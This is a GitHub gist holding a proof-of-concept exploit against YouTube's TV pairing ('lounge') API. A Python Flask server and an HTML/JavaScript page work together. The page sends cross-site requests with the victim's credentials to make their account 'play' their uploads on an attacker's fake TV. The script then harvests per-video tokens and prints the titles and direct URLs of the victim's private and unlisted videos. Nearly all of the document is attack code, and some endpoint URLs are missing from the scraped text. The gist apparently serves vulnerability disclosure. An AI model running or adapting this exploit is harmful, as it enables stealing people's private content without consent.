Skip to content

Instantly share code, notes, and snippets.

Last active June 5, 2024 06:38
Show Gist options
  • Save xdavidhu/b264ee21d8586e580adc7f821ddfbfc9 to your computer and use it in GitHub Desktop.
Save xdavidhu/b264ee21d8586e580adc7f821ddfbfc9 to your computer and use it in GitHub Desktop.
# POC Flow:
# 1. Request the victim/frontend to play all of his/her videos
# on the malicious "TV", and find out what videos are private.
# 2. Iterate over all of the victim's private videos,
# and request the victim/frontend to play all of
# them one by one. When the victim plays one, the
# malicious "TV" get's a credential for it.
import requests
import re
from flask import Flask, request, abort
import json
import threading
import logging
import time
from urllib.parse import unquote
import os
# Enter an API key with YouTube Data API enabled
# The host to bind the POC webserver to
host_to_bind_to = ""
# List of endpoints used by the script later.
# Extracted from rquests made by the YouTube/YT TV JS,
# so some parameters have some seemingly "random" values.
API_VIDEOS = "[video_ids]&key=[api_key]"
YT_BIND_INIT = "[token]&VER=8&v=2&RID=580&CVER=1&zx=lmxe5k2biyyg&t=1"
YT_BIND = "[token]&VER=8&v=2&RID=rpc&SID=[sid]&CI=1&AID=3&gsessionid=[gsid]&TYPE=xmlhttp&zx=2icgcq6qwpat&t=1"
YT_GET_VIDEO_INFO = "[video_id]&c=TVHTML5&vvt=[ctt]"
# Regexes used to grep for specific strings in the responses
INIT_SID_REGEX = r"(?<=\[\"c\",\").+?(?=\")"
INIT_GSID_REGEX = r"(?<=\[\"S\",\").+?(?=\")"
VIDEOIDS_REGEX = r"(?<=\"videoIds\":\").+?(?=\")"
CTT_REGEX = r"(?<=\"ctt\":\").+?(?=\")"
VIDEOID_REGEX = r"(?<=\\\"videoId\\\":\\\").+?(?=\\\")"
PRIVATE_URL_REGEX = r"(?<=\"url\":\").+?(?=\")"
PRIVATE_TITLE_REGEX = r"(?<=\"title\":\").+?(?=\")"
# Global variables used by the Flask server
global lounge_token
global lounge_token_ready
lounge_token_ready = False
global current_private_video_request_id
current_private_video_request_id = 0
global current_private_video_request_video_id
global private_video_request_ready
private_video_request_ready = False
global private_video_request_done
private_video_request_done = False
global victim_uploads_pl
# Flask server / endpoints
app = Flask(__name__)
log = logging.getLogger('werkzeug')
log.disabled = True
# Check the 'Host' header to protect against
# DNS rebinding attacks
def before_request_callback():
if request.headers.get("host") != host_to_bind_to + ":8090":
# Serves the 'frontend.html' to the victim
def get_frontend():
with open("frontend.html", "r") as file:
# Returns the initial configuration for the victim,
# which consists of the 'lounge_token' and the
# victim's 'uploads' playlist ID
def get_lounge_token():
if lounge_token_ready == False:
return 'not-ready'
return json.dumps([lounge_token, victim_uploads_pl])
# Returns the current 'private video request' to the frontend.
# The frontend is polling this endpoint, and when one
# private video is process, the backend updates the
# content to point to the next private video.
def get_current_private_video():
if private_video_request_ready == False:
return 'not-ready'
elif private_video_request_done:
return 'done'
return json.dumps({
"id": current_private_video_request_id,
"lounge_token": lounge_token,
"video_id": current_private_video_request_video_id
# end_flask
# Generates a 'screen_id'
def get_screen_id():
print("[+] Getting screen_id...")
r = requests.get(YT_SCREEN_ID)
return r.text
# Requests a 'loungeToken' with a 'screen_id'
def get_token(screen_id):
print("[+] Getting token for screen_id...")
r =, data={"screen_ids": screen_id})
return r.json()["screens"][0]["loungeToken"]
# Get's the credentials required for the 'bind' endpoint
def init_bind(lounge_token):
print("[+] Getting the credentials for polling...")
r ="[token]", lounge_token))
sid = re.findall(INIT_SID_REGEX, r.text)[0]
gsid = re.findall(INIT_GSID_REGEX, r.text)[0]
return sid, gsid
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" the victim's
# 'uploads' playlist.
def bind(lounge_token, sid, gsid):
print("[+] Starting to poll leanback bind endpoint...")
while True:
bind_url = YT_BIND.replace("[token]", lounge_token)
bind_url = bind_url.replace("[sid]", sid)
bind_url = bind_url.replace("[gsid]", gsid)
r = requests.get(bind_url)
if "\\\"videoIds\\\":[]" in r.text:
print("[!] Victim has no videos!")
return []
video_ids = re.findall(VIDEOIDS_REGEX, r.text)
if len(video_ids) > 0:
video_ids = video_ids[0].split(",")
print("[+] Victim connected! Videos: " + str(len(video_ids)))
return video_ids
# Queries the YouTube Data API to find out the
# privacy status of the provided list of videos.
def process_videos(video_ids):
unlisted_videos = []
unlisted_video_ids = []
private_video_ids = []
public_video_ids = []
print("[+] Querying YouTube Data API to find which videos are private/unlisted...")
api_url = API_VIDEOS.replace("[api_key]", YT_DATA_API_KEY)
api_url = api_url.replace("[video_ids]", ",".join(video_ids))
r = requests.get(api_url)
api_response = r.json()
for item in api_response["items"]:
if item["status"]["privacyStatus"] == "unlisted":
unlisted_videos.append([item["id"], item["snippet"]["title"]])
for video_id in video_ids:
if not video_id in public_video_ids:
if not video_id in unlisted_video_ids:
print("\n[+] Victim has:")
print(" " + str(len(public_video_ids)) + " public videos")
print(" " + str(len(unlisted_video_ids)) + " unlisted videos")
print(" " + str(len(private_video_ids)) + " private videos")
return unlisted_videos, private_video_ids
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" one of the
# victim's private videos.
def bind_private(lounge_token, sid, gsid, video_id):
print("[+] Starting to poll leanback bind endpoint for private video '" + video_id + "'...")
while True:
bind_url = YT_BIND.replace("[token]", lounge_token)
bind_url = bind_url.replace("[sid]", sid)
bind_url = bind_url.replace("[gsid]", gsid)
r = requests.get(bind_url)
ctt_find = re.findall(CTT_REGEX, r.text)
video_id_find = re.findall(VIDEOID_REGEX, r.text)
if len(ctt_find) > 0:
if len(video_id_find) > 0:
if video_id_find[0] == video_id:
return ctt_find[0]
# Queries the 'get_video_info' endpoint with the
# credentials from the victim to get one private video's
# raw video url and title.
def get_private_video_info(video_id, ctt):
print("[+] Requesting 'get_video_info' with ctt for '" + video_id + "'...")
video_url = YT_GET_VIDEO_INFO.replace("[video_id]", video_id)
video_url = video_url.replace("[ctt]", ctt)
r = requests.get(video_url, headers={"X-YouTube-Client-Name": "TVHTML5", "X-YouTube-Client-Version": "6.20180913"})
response = unquote(r.text).replace("\\u0026", "&")
url = re.findall(PRIVATE_URL_REGEX, response)[0]
title = re.findall(PRIVATE_TITLE_REGEX, response)[0]
return url, title
# Start of the main POC flow
# Start the flask server.
print("[+] Starting Flask in a background thread...")
flask_thread = threading.Thread(, kwargs={"host": host_to_bind_to,"port": 8090,"use_reloader": False})
print("\n[+] Server is running. Send 'http://" + host_to_bind_to + ":8090' to vitim.\n")
# Request the victim's channel ID from the user
channel_id = input("[?] Enter the victim's channel ID: ")
# Convert the channel ID to the victim's 'uploads' playlist ID.
l = list(channel_id)
l[1] = "U"
victim_uploads_pl = "".join(l)
print("[+] Victim's 'uploads' playlist ID: " + victim_uploads_pl)
print("[*] 'uploads' playlist's ID is just the channel id, but the second char 'C' -> 'U'")
print("[*] '" + channel_id + "' -> '" + victim_uploads_pl + "'\n")
# Step 1 - Requesting the victim to "play" his/her
# 'uploads' playlist.
screen_id = get_screen_id()
lounge_token = get_token(screen_id)
sid, gsid = init_bind(lounge_token)
lounge_token_ready = True
video_ids = bind(lounge_token, sid, gsid)
# Process these videos and find out which one is private/unlisted.
unlisted_videos, private_video_ids = process_videos(video_ids)
# Print the victim's unlisted videos.
print("\n[+] Victim's unlisted videos:")
for video in unlisted_videos:
print("\n ID: " + video[0])
print(" Title: " + video[1])
print(" YouTube URL:" + video[0])
# Step 2 - Iterate over all private videos of the victim,
# and request the frontend to "play" all of them one by one.
print("[+] Getting the vitim's private videos...")
private_videos = []
for video_id in private_video_ids:
current_private_video_request_video_id = video_id
# Create fresh credentials for each video.
# This could be done better, but getting the
# bind endpoint to work with only one request was
# quite complex already.
screen_id = get_screen_id()
lounge_token = get_token(screen_id)
sid, gsid = init_bind(lounge_token)
if not private_video_request_ready:
private_video_request_ready = True
# Increment the 'request ID' by one to keep the
# frontend & backend in sync.
current_private_video_request_id += 1
print("["+str(current_private_video_request_id)+"/"+str(len(private_video_ids))+"] Requesting frontend to play '" + video_id + "'...")
ctt = bind_private(lounge_token, sid, gsid, video_id)
print("[+] Got CTT '" + ctt + "' for video '" + video_id + "'!")
url, title = get_private_video_info(video_id, ctt)
private_videos.append([video_id, ctt, title, url])
# If the victim has no private videos,
# tell this to the frontend to make it
# stop polling.
if not private_video_request_ready:
private_video_request_ready = True
private_video_request_done = True
# Print the victim's private videos.
print("\n[+] Victim's private videos:")
for video in private_videos:
print("\n ID: " + video[0])
print(" Title: " + video[2].replace("+", " "))
print(" YouTube URL:" + video[0])
print(" Direct video URL: " + video[3])
print("[+] Done")
# Wait for frontend to recieve the 'done' command from
# the poll endpoint.
# Exit ugly, because I counldn't figure out how to
# stop Flask in the other thread...
<h4 id="log"></h4>
// Write a log entry to the page.
function log(message) {
document.getElementById("log").innerHTML += "\n " + message + "<br>"
// Sleep.
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
// Send the CSRF request to play a new video/playlist on the malicious "TV".
function send_command(loungeToken, id, idType) {
return new Promise(function (resolve, reject) {
var xhr = new XMLHttpRequest()"post", "{\"" + idType + "\":\"" + id + "\",\"currentIndex\":0}&loungeIdToken=" + loungeToken, true)
xhr.onload = function () {
xhr.onerror = function () {
xhr.withCredentials = true;
// Send a get request.
// Used to query the backend.
function get(url) {
return new Promise(function (resolve, reject) {
var xhr = new XMLHttpRequest()"get", url, true)
xhr.onload = function () {
async function main() {
log("[+] Page loaded")
// Start of "Step 1"
// Poll the victim for the 'loungeToken' and for which playlist to play.
log("[+] Polling backend for loungeTokenResponse...")
var loungeTokenResponse = "not-ready"
while (loungeTokenResponse == "not-ready") {
loungeTokenResponse = await get(window.location.href + "get_lounge_token")
await sleep(200)
log("[+] Got loungeTokenResponse: " + loungeTokenResponse)
loungeTokenResponse = JSON.parse(loungeTokenResponse)
// Play the playlist requested by the backend.
log("[+] Triggering malicious \"TV\" to play all uploads of victim...")
await send_command(loungeTokenResponse[0], loungeTokenResponse[1], "listId")
// Start of "Step 2"
// Poll the backend to find out which private video to play.
log("[+] Polling backend for private video requests...")
var previous_id = 0
while (true) {
private_video_request = await get(window.location.href + "get_current_private_video")
if (private_video_request == "not-ready") {
else if (private_video_request == "done") {
else {
private_video_request = JSON.parse(private_video_request)
// The ID has to be bigger then the last request.
// This way the backend & frontend can stay in sync
// to not play the same video multiple times.
if (private_video_request["id"] > previous_id) {
log("[+] Backend requested to play the private video: " + private_video_request["video_id"])
// Play the current private video on the malicious "TV".
log("[+] Playling private video '" + private_video_request["video_id"] + "' on malicious \"TV\"...")
await send_command(private_video_request["lounge_token"], private_video_request["video_id"], "videoId")
previous_id += 1;
await sleep(200)
log("[+] Done")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment